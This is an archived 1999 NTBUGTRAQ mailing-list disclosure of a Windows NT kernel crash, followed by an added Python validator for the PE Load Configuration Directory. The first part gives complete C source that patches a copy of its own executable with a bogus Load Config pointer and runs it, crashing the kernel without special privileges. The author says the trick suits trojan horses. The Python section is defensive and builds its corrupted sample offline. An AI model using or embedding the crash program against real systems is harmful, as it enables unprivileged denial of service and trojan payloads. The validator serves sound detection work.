Everhart, Glenn

From: Jussi Lahdenniemi [jl@VVF.FI]
Sent: Wednesday, March 31, 1999 4:57 AM
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: BSOD in user mode

Hello,

the following program causes NT kernel to bugcheck. It does not need any special privileges and can be hidden easily. Mainly usable in trojan horses, probably. Anyhow, NT's PE loader seems to crash when the Load Configuration Directory pointer in the executable header is illegal. Tested with NT4/SP4 and NT5 beta 2. Windows 95 and 98 do not mind.

#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>

int main( void )
{
    char me[MAX_PATH], tpath[MAX_PATH], tname[MAX_PATH];
    HANDLE h;
    DWORD x, foo;
    STARTUPINFO sui;
    PROCESS_INFORMATION pi;

    if( MessageBox( NULL, "Do you want to crash your NT?", "Crash it?",
                    MB_ICONQUESTION | MB_YESNOCANCEL ) != IDYES )
    {
        return 0;
    }

    /* Copy this executable to a temporary file so the copy can be patched. */
    GetModuleFileName( NULL, me, MAX_PATH );
    GetTempPath( MAX_PATH, tpath );
    GetTempFileName( tpath, "foo", 0, tname );
    CopyFile( me, tname, FALSE );

    h = CreateFile( tname, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                    OPEN_EXISTING, 0, NULL );
    if( h == INVALID_HANDLE_VALUE )
    {
        return 1;
    }

    /* e_lfanew at offset 0x3c of the DOS header holds the file offset of the PE header. */
    SetFilePointer( h, 0x3c, NULL, FILE_BEGIN );
    ReadFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );

    /* PE header + 0xc8 is the Load Configuration Directory entry of a PE32
       optional header (RVA followed by Size); overwrite both with a bogus value. */
    SetFilePointer( h, x + 0xc8, NULL, FILE_BEGIN );
    x = 0xba6defdd;
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
    CloseHandle( h );

    /* Launch the patched copy; the loader bugchecks while parsing the directory. */
    GetStartupInfo( &sui );
    CreateProcess( NULL, tname, NULL, NULL, FALSE, 0, NULL, NULL, &sui, &pi );
    return 0;
}

--
Jussi Lahdenniemi, Virtual Visions Finland     jl@vvf.fi
Hermiankatu 6-8C                               tel +358-50-3591405
33720 Tampere                                  fax +358-3-3186100
Finland
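The post describes a loader that trusts the Load Configuration Directory entry (data directory index 10, at PE header offset 0xc8 in a PE32 optional header) without checking it. The validator below is an added example, not code from the post or from Microsoft: it applies the sanity checks a file scanner or a hardened loader would want before following that pointer, namely that the RVA/Size pair does not wrap 32-bit arithmetic, stays inside SizeOfImage, and is covered by some section's virtual range. The PE image it parses is a constructed minimal PE32 built inline, and corrupt_load_config reproduces the post's two-DWORD overwrite on that sample so the check can be exercised offline.

```python
import struct

IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10   # index of the Load Config entry in the data directory table
SECTION_HEADER_SIZE = 40


def _result(ok, reason, rva=None, size=None):
    return {"ok": ok, "reason": reason, "rva": rva, "size": size}


def check_load_config_directory(data: bytes) -> dict:
    """Sanity-check the Load Configuration Directory of a PE image held in memory."""
    try:
        if len(data) < 0x40 or data[:2] != b"MZ":
            return _result(False, "not an MZ file")
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return _result(False, "bad PE signature offset")
        num_sections, = struct.unpack_from("<H", data, e_lfanew + 6)
        size_of_opt, = struct.unpack_from("<H", data, e_lfanew + 20)
        opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
        magic, = struct.unpack_from("<H", data, opt)
        if magic == 0x10B:                       # PE32: data directories start at opt + 96
            dd_off = opt + 96
        elif magic == 0x20B:                     # PE32+: data directories start at opt + 112
            dd_off = opt + 112
        else:
            return _result(False, "unknown optional header magic")
        size_of_image, = struct.unpack_from("<I", data, opt + 56)
        num_rva, = struct.unpack_from("<I", data, dd_off - 4)
        if IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG >= num_rva:
            return _result(True, "no load config entry", 0, 0)
        rva, size = struct.unpack_from("<II", data, dd_off + 8 * IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG)
        if rva == 0 and size == 0:
            return _result(True, "load config absent", 0, 0)
        # Reject values a 32-bit loader would follow out of the mapped image (wrap-around included).
        if rva + size > 0xFFFFFFFF or rva + size > size_of_image:
            return _result(False, f"load config {rva:#x}+{size:#x} outside image "
                                  f"(SizeOfImage {size_of_image:#x})", rva, size)
        # The directory must also be backed by a section's virtual range.
        sec = opt + size_of_opt
        for _ in range(num_sections):
            vsize, vaddr, rawsize = struct.unpack_from("<III", data, sec + 8)
            if vaddr <= rva and rva + size <= vaddr + max(vsize, rawsize):
                return _result(True, "load config inside a section", rva, size)
            sec += SECTION_HEADER_SIZE
        return _result(False, "load config not covered by any section", rva, size)
    except struct.error:
        return _result(False, "truncated headers")


def build_sample_pe32() -> bytes:
    """Constructed minimal PE32: DOS header, PE header, one .rdata section, sane Load Config entry."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section, 224-byte optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 28, 0x00400000)                  # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)                      # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                       # FileAlignment
    struct.pack_into("<I", opt, 56, 0x2000)                      # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x200)                       # SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                           # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, 0x1080, 0x40)
    section = struct.pack("<8sIIIIIIHHI", b".rdata", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x40000040)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section
    return headers.ljust(0x200, b"\0") + bytes(0x200)            # section raw data at file offset 0x200


def corrupt_load_config(data: bytes, value: int = 0xBA6DEFDD) -> bytes:
    """Reproduce the post's corruption on a sample: overwrite RVA and Size at PE header + 0xc8."""
    buf = bytearray(data)
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    struct.pack_into("<II", buf, e_lfanew + 0xC8, value, value)
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample_pe32()
    print("clean sample :", check_load_config_directory(sample))
    print("corrupted    :", check_load_config_directory(corrupt_load_config(sample)))
```

The "outside image" test is the one that catches the post's file: 0xba6defdd as both RVA and Size overflows 32 bits and is far beyond any plausible SizeOfImage, and even the wrapped sum a 32-bit loader would compute still exceeds it. The section-coverage test is the stricter check a loader should apply before dereferencing the directory, since an RVA inside SizeOfImage can still point at unmapped padding between sections.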